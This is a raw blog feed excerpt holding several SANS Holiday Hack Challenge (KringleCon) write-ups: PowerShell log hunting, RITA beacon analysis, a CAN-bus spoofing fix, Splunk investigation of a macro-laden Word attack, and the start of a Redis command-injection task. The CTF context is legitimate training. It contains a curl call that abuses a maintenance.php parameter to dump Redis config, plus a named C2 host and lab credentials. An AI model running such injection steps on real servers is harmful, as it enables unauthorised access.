&lt;/span>&lt;span class="s1">Do this for me and then you /shall/see.
&lt;/span>&lt;span class="s1">PS /home/elf&amp;gt; Get-Process -IncludeUserName
&lt;/span>&lt;span class="s1"> WS(M) CPU(s) Id UserName ProcessName
&lt;/span>&lt;span class="s1"> ----- ------ -- -------- -----------
&lt;/span>&lt;span class="s1"> 28.99 2.01 6 root CheerLaserServi
&lt;/span>&lt;span class="s1"> 191.95 16.86 31 elf elf
&lt;/span>&lt;span class="s1"> 3.57 0.02 1 root init
&lt;/span>&lt;span class="s1"> 0.72 0.00 24 bushy sleep
&lt;/span>&lt;span class="s1"> 0.75 0.00 26 alabaster sleep
&lt;/span>&lt;span class="s1"> 0.77 0.00 28 minty sleep
&lt;/span>&lt;span class="s1"> 0.82 0.00 29 holly sleep
&lt;/span>&lt;span class="s1"> 3.27 0.00 30 root su
&lt;/span>&lt;span class="s1">PS /home/elf&amp;gt; Stop-Process 24 26 28 29
&lt;/span>&lt;span class="s1">PS /home/elf&amp;gt; Get-Content /shall/see
&lt;/span>&lt;span class="s1">Get the .xml children of /etc - an event log to be found. Group all .Id&amp;#39;&lt;/span>s and the last thing will be in the Properties of the lonely unique event Id.
PS /home/elf&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So it seemed the gas values were hidden somewhere in an &lt;code>.xml&lt;/code> file in the &lt;code>/etc&lt;/code> folder. To find this file I turned to another command of PowerShell:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem -Recurse -Include *.xml -Path /etc/
Directory: /etc/systemd/system/timers.target.wants
Mode LastWriteTime Length Name
---- ------------- ------ ----
--r--- 11/18/19 7:53 PM &lt;span class="m">10006962&lt;/span> EventLog.xml
&lt;/code>&lt;/pre>&lt;/div>&lt;p>It was a rather large XML file, so instead of displaying it, I just did a simple text-based search. I know the hint said I should parse the XML and do some fancy Group-By based on ID and whatnot, but I am fond of simpler shortcuts whenever possible, so I did a simple string search that quickly gave me the answer to the composition of gases:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-Content /etc/systemd/system/timers.target.wants/EventLog.xml &lt;span class="p">|&lt;/span> Select-String -pattern &lt;span class="s2">&amp;#34;gas&amp;#34;&lt;/span>
&amp;lt;S &lt;span class="nv">N&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;Message&amp;#34;&lt;/span>&amp;gt;
Process Create: -
RuleName: -
UtcTime: 2019-11-07 17:59:56.525
ProcessGuid: &lt;span class="o">{&lt;/span>BA5C6BBB-5B9C-5DC4-0000-00107660A900&lt;span class="o">}&lt;/span>
ProcessId: &lt;span class="m">3664&lt;/span>
Image: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\S&lt;/span>ystem32&lt;span class="se">\W&lt;/span>indowsPowerShell&lt;span class="se">\v&lt;/span>1.0&lt;span class="se">\p&lt;/span>owershell.exe
FileVersion: 10.0.14393.206 &lt;span class="o">(&lt;/span>rs1_release.160915-0644&lt;span class="o">)&lt;/span>
Description: Windows PowerShell Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\S&lt;/span>ystem32&lt;span class="se">\W&lt;/span>indowsPowerShell&lt;span class="se">\v&lt;/span>1.0&lt;span class="se">\p&lt;/span>owershell.exe -c &lt;span class="s2">&amp;#34;`&lt;/span>&lt;span class="nv">$correct_gases_postbody&lt;/span>&lt;span class="s2"> = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}`n&amp;#34;&lt;/span>
CurrentDirectory: C:&lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> User: ELFURESEARCH&lt;span class="se">\a&lt;/span>llservices
LogonGuid: &lt;span class="o">{&lt;/span>BA5C6BBB-5B9C-5DC4-0000-0020F55CA900&lt;span class="o">}&lt;/span>
LogonId: 0xA95CF5
TerminalSessionId: &lt;span class="m">0&lt;/span>
IntegrityLevel: High
Hashes: &lt;span class="nv">MD5&lt;/span>&lt;span class="o">=&lt;/span>097CE5761C89434367598B34FE32893B
ParentProcessGuid: &lt;span class="o">{&lt;/span>BA5C6BBB-4C79-5DC4-0000-001029350100&lt;span class="o">}&lt;/span>
ParentProcessId: &lt;span class="m">1008&lt;/span>
ParentImage: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\S&lt;/span>ystem32&lt;span class="se">\s&lt;/span>vchost.exe
ParentCommandLine: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\s&lt;/span>ystem32&lt;span class="se">\s&lt;/span>vchost.exe -k netsvcs&amp;lt;/S&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>I formatted the output a bit, but basically it is very easy to spot the composition of gases within the arguments of the PowerShell executable: &lt;code>O=6 H=7 He=3 N=4 Ne=22 Ar=11 Xe=10 F=20 Kr=8 Rn=9&lt;/code>. With this final piece of the puzzle complete, I used the laser Web API to submit the correct values and reached the 5 Mega-Jollies of Xmas Cheer with the laser output.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/off&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/angle?val&lt;span class="o">=&lt;/span>65.5&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val&lt;span class="o">=&lt;/span>-33.5&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val&lt;span class="o">=&lt;/span>1.867&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://127.0.0.1:1225/api/gases -Body &lt;span class="s2">&amp;#34;O=6&amp;amp;H=7&amp;amp;He=3&amp;amp;N=4&amp;amp;Ne=22&amp;amp;Ar=11&amp;amp;Xe=10&amp;amp;F=20&amp;amp;Kr=8&amp;amp;Rn=9&amp;#34;&lt;/span> -Method POST&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/on&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/output&lt;span class="o">)&lt;/span>.RawContent
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now that this terminal issue is solved, let&amp;rsquo;s check with Sparkle Redberry for the hints he promised:&lt;/p>
&lt;blockquote>
&lt;p>You got it - three cheers for cheer!
For objective 5, have you taken a look at our Zeek logs?
Something&amp;rsquo;s gone wrong. But I hear someone named Rita can help us.
Can you and she figure out what happened?&lt;/p>
&lt;/blockquote>
&lt;h2 id="main-objective">Main Objective&lt;/h2>
&lt;p>So the hint from Sparkle mentioned Rita, which is not a reference to some other character on the ELFU campus, but a
&lt;a href="https://www.activecountermeasures.com/free-tools/rita/" target="_blank" rel="noopener">tool&lt;/a> for solving the main objective. The tool is available through a GitHub
&lt;a href="https://github.com/activecm/rita" target="_blank" rel="noopener">repository&lt;/a>.&lt;/p>
&lt;p>As a next step I unpacked the 300 MB zip and noticed that it already contained a folder &lt;strong>ELFU&lt;/strong> which had an &lt;strong>index.html&lt;/strong>. I loaded it up in my browser and noticed that it contained statistics from presumably the same log files so I did not had to install Rita eventually. Instead I relied on the contents of this ELFU folder from the unpacked zip.&lt;/p>
&lt;p>So next I opened the index.html and saw that one database with name &lt;strong>ELFU&lt;/strong> was available. I clicked it and got a bunch of tabs with different kinds of information:&lt;/p>
&lt;p>&lt;img src="../images/obj5-rita.png" alt="Rita Web UI">&lt;/p>
&lt;p>I first noticed the &lt;strong>Beacons&lt;/strong> tab and the very first item in the table with 7660 connections and source IP of &lt;strong>192.168.134.130&lt;/strong>. Then I remembered that I was looking for the IP address of a system which is infected with malware. Then I also checked the &lt;strong>Long Connections&lt;/strong> tab and the same source IP showed up with the longest connection of 1000 (probably seconds?). Then I tried my luck with this IP address as the answer and the value was accepted!&lt;/p></description></item><item><title>Sleigh CAN-D-BUS Issue</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective7/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective7/</guid><description>&lt;p>&lt;img src="../images/obj7/objective7.png" alt="Objective7">&lt;/p>
&lt;p>Now that Spunk is solved, my badge tells me to head up to the &lt;code>NetWars&lt;/code> room for solving the next objective and talk with &lt;code>Wunorse Openslae&lt;/code> who can help if you figure out what&amp;rsquo;s up with his terminal:&lt;/p>
&lt;blockquote>
&lt;p>Hey Santa!
Those tweaks you made to the sled just don’t seem right to me.
I can’t figure out what’s wrong, but maybe you can check it out to fix it.&lt;/p>
&lt;/blockquote>
&lt;p>Next I click on the terminal next to him, which pops up a CLI session. As the MOTD tells me, there is a file with logs of the CAN traffic of the sleigh. In the logs there are few distinct message types:&lt;/p>
&lt;ul>
&lt;li>Engine &lt;code>UP/DOWN&lt;/code> messages (many of these)&lt;/li>
&lt;li>LOCK and &lt;code>UNLOCK&lt;/code> messages (3 in total!)&lt;/li>
&lt;/ul>
&lt;p>So then I inspect the &lt;code>candump.log&lt;/code> file and do some transformations on it. First, I filter each line and keep only the third column. Then I extract the first 3 characters of each line and use &lt;code>sort -nr&lt;/code> &amp;amp; &lt;code>uniq -c&lt;/code> to show how many of each line is present in the logs:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@87cee25c674e:~$ cat candump.log &lt;span class="p">|&lt;/span> awk &lt;span class="s1">&amp;#39;{print $3}&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> cut -b 1-3 &lt;span class="p">|&lt;/span> sort -nr &lt;span class="p">|&lt;/span> uniq -c
&lt;span class="ln">2&lt;/span> &lt;span class="m">1331&lt;/span> &lt;span class="m">244&lt;/span>
&lt;span class="ln">3&lt;/span> &lt;span class="m">35&lt;/span> &lt;span class="m">188&lt;/span>
&lt;span class="hl">&lt;span class="ln">4&lt;/span> &lt;span class="m">3&lt;/span> 19B
&lt;/span>&lt;span class="ln">5&lt;/span>
&lt;span class="ln">6&lt;/span>elf@87cee25c674e:~$ cat candump.log &lt;span class="p">|&lt;/span> grep 19B#
&lt;span class="ln">7&lt;/span>&lt;span class="o">(&lt;/span>1608926664.626448&lt;span class="o">)&lt;/span> vcan0 19B#000000000000
&lt;span class="hl">&lt;span class="ln">8&lt;/span>&lt;span class="o">(&lt;/span>1608926671.122520&lt;span class="o">)&lt;/span> vcan0 19B#00000F000000
&lt;/span>&lt;span class="ln">9&lt;/span>&lt;span class="o">(&lt;/span>1608926674.092148&lt;span class="o">)&lt;/span> vcan0 19B#000000000000
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This helps to know that messages with ID &lt;code>19B&lt;/code> are related to &lt;code>LOCK/UNLOCK&lt;/code> events. This will be useful to know for fixing Santa&amp;rsquo;s sleigh next:&lt;/p>
&lt;p>&lt;img src="../images/obj7/run-to-answer-can-bus.png" alt="RunToAnswer CAN BUS">&lt;/p>
&lt;p>Next I click on Santa&amp;rsquo;s sleigh, and a strange UI interface pops up. To learn more about what it is, I watch the KringleCon talk from &lt;strong>Chris Elgee&lt;/strong> on CAN Bus in vehicles
&lt;a href="https://www.youtube.com/watch?v=96u-uHRBI0I" target="_blank" rel="noopener">HERE&lt;/a>.&lt;/p>
&lt;p>&lt;img src="../images/obj7/sleigh-can-bus.png" alt="Sleigh CAN-D-BUS">&lt;/p>
&lt;p>Initially, I just naively excluded all messages with ID &lt;code>19B&lt;/code> but that did not seem to fix it. Then I excluded some of the most common messages to make the steam slower a bit so that I can see more clearly what was happening. That&amp;rsquo;s when I discovered a strange message with the same ID but non-zero payload in the stream:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>&lt;span class="m">1609081466157&lt;/span> 019#00000000
&lt;span class="ln">2&lt;/span>&lt;span class="m">1609081466258&lt;/span> 188#00000000
&lt;span class="hl">&lt;span class="ln">3&lt;/span>&lt;span class="m">1609081466462&lt;/span> 19B#0000000F2057 &lt;span class="s">&amp;lt;&amp;lt; THIS SHOULD NOT&lt;/span> BE HERE!
&lt;/span>&lt;span class="ln">4&lt;/span>&lt;span class="m">1609081466562&lt;/span> 080#000000
&lt;span class="ln">5&lt;/span>&lt;span class="m">1609081466663&lt;/span> 019#00000000
&lt;span class="ln">6&lt;/span>&lt;span class="m">1609081466767&lt;/span> 188#00000000
&lt;/code>&lt;/pre>&lt;/div>&lt;p>I thought this may be the malicious message that is being inserted onto the bus, so I excluded it. This was probably a step in the right direction, but it was still not enough to complete the objective.&lt;/p>
&lt;p>Next, I proceeded to play a bit with the controls and noticed something strange when the slider for the break was moved. I noticed that on each cycle, two messages would be emitted from the break:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>&lt;span class="m">1609082448556&lt;/span> 080#000028
&lt;span class="hl">&lt;span class="ln">2&lt;/span>&lt;span class="m">1609082448576&lt;/span> 080#FFFFF0 &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> EXCLUDE!
&lt;/span>&lt;span class="ln">3&lt;/span>&lt;span class="m">1609082449074&lt;/span> 080#000028
&lt;span class="hl">&lt;span class="ln">4&lt;/span>&lt;span class="m">1609082449077&lt;/span> 080#FFFFF3 &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> EXCLUDE!
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The ones with high payload value seemed suspicious, so I excluded them all and voila, this was the correct solution!&lt;/p>
&lt;p>&lt;img src="../images/obj7/can-d-bus-solved.png" alt="CAN D BUS Solved">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Splunk</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective6/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective6/</guid><description>&lt;h2 id="evil-emails">Evil emails!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Access &lt;a href="https://splunk.elfu.org/">https://splunk.elfu.org/&lt;/a> as elf with password elfsocks.
What was the message for Kent that the adversary embedded in this attack?
The SOC folks at that link will help you along!
For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.&lt;/p>
&lt;/blockquote>
&lt;p>For additional advice you are told to visit Hermey Hall and talk to Prof Banas:&lt;/p>
&lt;p>&lt;img src="../images/obj6-banas.png" alt="Prof Banas">&lt;/p>
&lt;blockquote>
&lt;p>Hi, I&amp;rsquo;m Dr. Banas, professor of Cheerology at Elf University.
This term, I&amp;rsquo;m teaching &amp;ldquo;HOL 404: The Search for Holiday Cheer in Popular Culture,&amp;rdquo; and I&amp;rsquo;ve had quite a shock!
I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC.
Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP!
If I don&amp;rsquo;t, he will have to report the incident to the boss of the SOC.
Apparently, I can find out more information from this website &lt;a href="https://splunk.elfu.org/">https://splunk.elfu.org/&lt;/a> with the username: elf / Password: elfsocks.
I don&amp;rsquo;t know anything about computer security. Can you please help me?&lt;/p>
&lt;/blockquote>
&lt;p>This time there was no terminal which needed to be fixed through some command line magic, instead you just had to browse to the URL given by Prof. Banas and follow the hints through the ElfU SOC chat interface. When you first visit, you will be greeted with the below message.&lt;/p>
&lt;p>&lt;img src="../images/obj6-splunk.png" alt="Splunk Interface">&lt;/p>
&lt;p>The main question to answer:&lt;/p>
&lt;p>&lt;code>What was the message for Kent that the adversary embedded in this attack?&lt;/code>&lt;/p>
&lt;p>To get to the answer, you should rely on the training questions and the hints from SOC characters in the chat. Alice in the chat will tell you that you don&amp;rsquo;t necessarily need to solve all the training questions if you already know Splunk, you can safely skip and look for the answer to the main question. To do this you will need these 2 resources:&lt;/p>
&lt;ul>
&lt;li>ElfU Splunk Search: &lt;a href="https://splunk.elfu.org/en-GB/app/SA-elfusoc/search">https://splunk.elfu.org/en-GB/app/SA-elfusoc/search&lt;/a>&lt;/li>
&lt;li>ElfU File Archive: &lt;a href="http://elfu-soc.s3-website-us-east-1.amazonaws.com/">http://elfu-soc.s3-website-us-east-1.amazonaws.com/&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>Since I never used Splunk before, I went through the training questions anyway to learn the logic of Splunk:&lt;/p>
&lt;h4 id="q1---what-is-the-short-host-name-of-professor-banas-computer">Q1 - What is the short host name of Professor Banas&amp;rsquo; computer?&lt;/h4>
&lt;p>This can be answered by simply paying attention to the discussion in the chat windows. If you missed it go back to the group chat called &lt;strong>Chat with #ELFU SOC&lt;/strong> and read it again. Then you will see that the answer is &lt;strong>sweetums&lt;/strong>.&lt;/p>
&lt;h4 id="q2---what-is-the-fully-path-and-name-of-the-sensitive-file-that-was-likely-accessed-and-copied-by-the-attacker">Q2 - What is the fully path and name of the sensitive file that was likely accessed and copied by the attacker?&lt;/h4>
&lt;p>For this question, Alice mentioned that Prof. Banas is really close with Santa, and that they worry that the attacker who compromised the Prof&amp;rsquo;s machine may have accessed some sensitive information related to Santa. Her tip is to do a simple text search for something you are interested in, which she says can lead straight to the answer quite often. So when you search the data for any mention of &lt;strong>santa&lt;/strong> you will get a few hits, the answer can be found within the below text:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">ParameterBinding(Format-List):
name=&amp;#34;InputObject&amp;#34;;
value=&amp;#34;C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt:1:Carl, you know there&amp;#39;s no one I trust more than you to help. Can you have a look at this draft Naughty and Nice list for 2019 and let me know your thoughts? -Santa&amp;#34;
&lt;/code>&lt;/pre>&lt;/div>&lt;h4 id="q3---what-is-the-fully-qualified-domain-namefqdn-of-the-command-and-controlc2-server">Q3 - What is the fully-qualified domain name(FQDN) of the command and control(C2) server?&lt;/h4>
&lt;p>Since these questions are meant to be for training, Alice will almost give you the correct search term straight away. In one of her messages she posted a link to a Splunk search that she did with the below parameters:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="nv">index&lt;/span>&lt;span class="o">=&lt;/span>main &lt;span class="nv">sourcetype&lt;/span>&lt;span class="o">=&lt;/span>XmlWinEventLog:Microsoft-Windows-Sysmon/Operational powershell &lt;span class="nv">EventCode&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">3&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This Splunk search gave away the answer in the first search result. The C&amp;amp;C server&amp;rsquo;s FQDN is: &lt;strong>144.202.46.214.vultr.com&lt;/strong>.&lt;/p>
&lt;h4 id="q4---what-document-is-involved-with-launching-the-malicious-powershell-code-provide-just-file-name">Q4 - What document is involved with launching the malicious PowerShell code (provide just file name)?&lt;/h4>
&lt;p>For this question Alice showed a neat technique which can help filter the pool of event logs by setting a time-window of +/- 5 seconds of some interesting event at a particular point in time. Eventually she points out that you are looking for a document, so why not search for the string &lt;strong>doc&lt;/strong> and see what comes up:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">19th Century Holiday Cheer Assignment.doc
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This seemed promising, however this was not accepted as the answer. Then I remembered that word documents have different extensions such as &lt;strong>.docx&lt;/strong>, &lt;strong>.docm&lt;/strong> and so on, so I did a Google search for PowerShell execution from Word and realized that this requires Word Macros to be enabled, which means the file should have the &lt;strong>.docm&lt;/strong> extension. Next I tried the same search but for &lt;strong>docm&lt;/strong> and this time and the same filename popped up, but with .docm extension, which was the correct answer: &lt;strong>19th Century Holiday Cheer Assignment.docm&lt;/strong>.&lt;/p>
&lt;h4 id="q5---how-many-unique-email-addresses-were-used-to-send-holiday-cheer-essays-to-professor-banas">Q5 - How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?&lt;/h4>
&lt;p>To answer this one, Alice gave some useful info on
&lt;a href="https://stoq.punchcyber.com/" target="_blank" rel="noopener">StoQ&lt;/a> and a starting query as well. If you modify the query a bit to show less info, you can easily count the emails manually:&lt;/p>
&lt;p>&lt;code>index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.subject | sort - _time&lt;/code>&lt;/p>
&lt;p>Just sort the table based on the subject line and count how many there are for subject: &lt;strong>Holiday Cheer Assignment Submission&lt;/strong>. In total you should get &lt;strong>21&lt;/strong> which is the correct answer.&lt;/p>
&lt;h4 id="q6---what-was-the-password-for-the-zip-archive-that-contained-the-suspicious-file">Q6 - What was the password for the zip archive that contained the suspicious file?&lt;/h4>
&lt;p>This one you can solve very easily without many hints, if you cared to read some of the emails that Prof received from his students as part of their course submissions. The ZIP which contained the malicious word document that was locked with the password &lt;strong>123456789&lt;/strong> which was mentioned in the email as well. Not very strong, nor secure&amp;hellip;&lt;/p>
&lt;h4 id="q7---what-email-address-did-the-suspicious-file-come-from">Q7 - What email address did the suspicious file come from?&lt;/h4>
&lt;p>This question was answered easily if you inspected any of the emails from the previous question. The sender was &lt;strong>&lt;a href="mailto:bradly.buttercups@eifu.org">bradly.buttercups@eifu.org&lt;/a>&lt;/strong>.&lt;/p>
&lt;h2 id="main-question">Main Question&lt;/h2>
&lt;p>Finally, to answer the main question of Objective 6, return to Alice for some additional hints. For obvious reasons the malicious document is not available for you to inspect, but the File Archive she mentioned earlier is a good place to look if you know what to look for. She also pointed out that it contains metadata from &lt;strong>StoQ&lt;/strong>, and also provided a search term:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="nv">index&lt;/span>&lt;span class="o">=&lt;/span>main &lt;span class="nv">sourcetype&lt;/span>&lt;span class="o">=&lt;/span>stoq &lt;span class="s2">&amp;#34;results{}.workers.smtp.from&amp;#34;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;bradly buttercups &amp;lt;bradly.buttercups@eifu.org&amp;gt;&amp;#34;&lt;/span>
&lt;span class="p">|&lt;/span> &lt;span class="nb">eval&lt;/span> &lt;span class="nv">results&lt;/span> &lt;span class="o">=&lt;/span> spath&lt;span class="o">(&lt;/span>_raw, &lt;span class="s2">&amp;#34;results{}&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>
&lt;span class="p">|&lt;/span> mvexpand results
&lt;span class="p">|&lt;/span> &lt;span class="nb">eval&lt;/span> &lt;span class="nv">path&lt;/span>&lt;span class="o">=&lt;/span>spath&lt;span class="o">(&lt;/span>results, &lt;span class="s2">&amp;#34;archivers.filedir.path&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>, &lt;span class="nv">filename&lt;/span>&lt;span class="o">=&lt;/span>spath&lt;span class="o">(&lt;/span>results, &lt;span class="s2">&amp;#34;payload_meta.extra_data.filename&amp;#34;&lt;/span>&lt;span class="o">)&lt;/span>, &lt;span class="nv">fullpath&lt;/span>&lt;span class="o">=&lt;/span>path.&lt;span class="s2">&amp;#34;/&amp;#34;&lt;/span>.filename
&lt;span class="p">|&lt;/span> search fullpath!&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;&amp;#34;&lt;/span>
&lt;span class="p">|&lt;/span> table filename,fullpath
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The final hint from Alice will definitely lead you to the file that you need to answer the question. Can you get it?&lt;/p>
&lt;blockquote>
&lt;p>Last thing for you today: Did you know that modern Word documents are (at their core) nothing more than a bunch of .xml files?&lt;/p>
&lt;/blockquote>
&lt;p>Of course it is the &lt;strong>core.xml&lt;/strong>. The Splunk search she gave you shows that its path is: &lt;code>/home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4/core.xml&lt;/code>. So now you just need to navigate to this file in the File Archive, download it and peek inside:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">&lt;span class="cp">&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34; standalone=&amp;#34;yes&amp;#34;?&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:coreProperties&lt;/span> &lt;span class="na">xmlns:cp=&lt;/span>&lt;span class="s">&amp;#34;http://schemas.openxmlformats.org/package/2006/metadata/core-properties&amp;#34;&lt;/span>
&lt;span class="na">xmlns:dc=&lt;/span>&lt;span class="s">&amp;#34;http://purl.org/dc/elements/1.1/&amp;#34;&lt;/span> &lt;span class="na">xmlns:dcterms=&lt;/span>&lt;span class="s">&amp;#34;http://purl.org/dc/terms/&amp;#34;&lt;/span>
&lt;span class="na">xmlns:dcmitype=&lt;/span>&lt;span class="s">&amp;#34;http://purl.org/dc/dcmitype/&amp;#34;&lt;/span>
&lt;span class="na">xmlns:xsi=&lt;/span>&lt;span class="s">&amp;#34;http://www.w3.org/2001/XMLSchema-instance&amp;#34;&lt;/span>&lt;span class="nt">&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:title&amp;gt;&lt;/span>Holiday Cheer Assignment&lt;span class="nt">&amp;lt;/dc:title&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:subject&amp;gt;&lt;/span>19th Century Cheer&lt;span class="nt">&amp;lt;/dc:subject&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:creator&amp;gt;&lt;/span>Bradly Buttercups&lt;span class="nt">&amp;lt;/dc:creator&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:keywords&amp;gt;&amp;lt;/cp:keywords&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dc:description&amp;gt;&lt;/span>Kent you are so unfair. And we were going to make you the king of the Winter Carnival.&lt;span class="nt">&amp;lt;/dc:description&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:lastModifiedBy&amp;gt;&lt;/span>Tim Edwards&lt;span class="nt">&amp;lt;/cp:lastModifiedBy&amp;gt;&amp;lt;cp:revision&amp;gt;&lt;/span>4&lt;span class="nt">&amp;lt;/cp:revision&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dcterms:created&lt;/span> &lt;span class="na">xsi:type=&lt;/span>&lt;span class="s">&amp;#34;dcterms:W3CDTF&amp;#34;&lt;/span>&lt;span class="nt">&amp;gt;&lt;/span>2019-11-19T14:54:00Z&lt;span class="nt">&amp;lt;/dcterms:created&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;dcterms:modified&lt;/span> &lt;span class="na">xsi:type=&lt;/span>&lt;span class="s">&amp;#34;dcterms:W3CDTF&amp;#34;&lt;/span>&lt;span class="nt">&amp;gt;&lt;/span>2019-11-19T17:50:00Z&lt;span class="nt">&amp;lt;/dcterms:modified&amp;gt;&lt;/span>
&lt;span class="nt">&amp;lt;cp:category&amp;gt;&amp;lt;/cp:category&amp;gt;&amp;lt;/cp:coreProperties&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>You will find the secret message to Kent within the &lt;strong>&amp;lt;dc:description&amp;gt;&lt;/strong> tag:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Kent you are so unfair. And we were going to make you the king of the Winter Carnival.
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Broken Tag Generator</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective8/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective8/</guid><description>&lt;p>&lt;img src="../images/obj8/objective8.png" alt="Objective8">&lt;/p>
&lt;p>Now that Santa&amp;rsquo;s sleigh&amp;rsquo;s CAN-D-BUS issue is fixed it&amp;rsquo;s time to move on to Objective 8 for fixing the KringleCon Tag Generator in the Wrapping Room. First, I head to the Kitchen to talk with &lt;code>Holly Evergreen&lt;/code> who is ready to trade some hints for my help with the Redis terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj8/holly-evergreen.png" alt="Holly Evergreen">&lt;/p>
&lt;blockquote>
&lt;p>Hi Santa!
If you have a chance, I&amp;rsquo;d love to get your feedback on the Tag Generator updates!
I&amp;rsquo;m a little concerned about the file upload feature, but Noel thinks it will be fine.&lt;/p>
&lt;/blockquote>
&lt;p>Clicking the Redis Terminal next to him will bring up a shell window. After some inspection the task at hand is more or less clear: I need to exfiltrate the &lt;code>index.php&lt;/code> file from the server on localhost using &lt;code>maintenance.php&lt;/code>. This endpoint accepts a &lt;strong>cmd&lt;/strong> parameter which executes the given parameters in redis-cli.&lt;/p>
&lt;p>For start, I query the entire redis config with the below command (which is then filtered for just the PW):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="hl">&lt;span class="ln">1&lt;/span>player@100dfcdfbca2:~$ curl http://localhost/maintenance.php?cmd&lt;span class="o">=&lt;/span>CONFIG,GET,* 2&amp;gt;/dev/null &lt;span class="p">|&lt;/span> grep pass -A &lt;span class="m">3&lt;/span>
